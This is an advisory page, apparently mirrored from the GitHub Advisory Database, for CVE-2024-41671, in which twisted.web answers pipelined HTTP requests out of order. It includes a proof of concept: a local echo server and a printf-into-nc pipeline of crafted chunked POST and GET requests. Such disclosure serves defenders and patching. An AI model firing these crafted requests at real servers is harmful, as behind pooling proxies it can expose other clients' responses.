Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1jOG04LWo0NDgteGp4N84AA-MX
twisted.web has disordered HTTP pipeline response
Summary
The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.
PoC
- Start a fresh Debian container:
docker run --workdir /repro --rm -it debian:bookworm-slim
- Install twisted and its dependencies:
apt -y update && apt -y install ncat git python3 python3-pip \
&& git clone --recurse-submodules https://github.com/twisted/twisted \
&& cd twisted \
&& pip3 install --break-system-packages .
- Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:
from twisted.web import server, resource
from twisted.internet import reactor
class TheResource(resource.Resource):
isLeaf = True
def render_GET(self, request) -> bytes:
return b"GET"
def render_POST(self, request) -> bytes:
return b"POST"
site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
- Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
- Observe that the responses arrive out of order:
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html
POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html
GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html
POST
Impact
See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.
Permalink: https://github.com/advisories/GHSA-c8m8-j448-xjx7JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jOG04LWo0NDgteGp4N84AA-MX
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 6 months ago
Updated: about 2 months ago
CVSS Score: 8.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
EPSS Percentage: 0.00045
EPSS Percentile: 0.17541
Identifiers: GHSA-c8m8-j448-xjx7, CVE-2024-41671
References:
- https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
- https://nvd.nist.gov/vuln/detail/CVE-2024-41671
- https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
- https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
- https://github.com/advisories/GHSA-c8m8-j448-xjx7
Blast Radius: 32.6
Affected Packages
pypi:twisted
Dependent packages: 163Dependent repositories: 8,515
Downloads: 4,221,414 last month
Affected Version Ranges: <= 24.3.0
Fixed in: 24.7.0rc1
All affected versions: 1.0.1, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.1.0, 1.1.1, 1.2.0, 2.1.0, 2.4.0, 2.5.0, 8.0.0, 8.0.1, 8.1.0, 8.2.0, 9.0.0, 10.0.0, 10.1.0, 10.2.0, 11.0.0, 11.1.0, 12.0.0, 12.1.0, 12.2.0, 12.3.0, 13.0.0, 13.1.0, 13.2.0, 14.0.0, 14.0.1, 14.0.2, 15.0.0, 15.1.0, 15.2.0, 15.2.1, 15.3.0, 15.4.0, 15.5.0, 16.0.0, 16.1.0, 16.1.1, 16.2.0, 16.3.0, 16.3.1, 16.3.2, 16.4.0, 16.4.1, 16.5.0, 16.6.0, 17.1.0, 17.5.0, 17.9.0, 18.4.0, 18.7.0, 18.9.0, 19.2.0, 19.2.1, 19.7.0, 19.10.0, 20.3.0, 21.2.0, 21.7.0, 22.1.0, 22.2.0, 22.4.0, 22.8.0, 22.10.0, 23.8.0, 23.10.0, 24.3.0
All unaffected versions: 24.7.0, 24.10.0, 24.11.0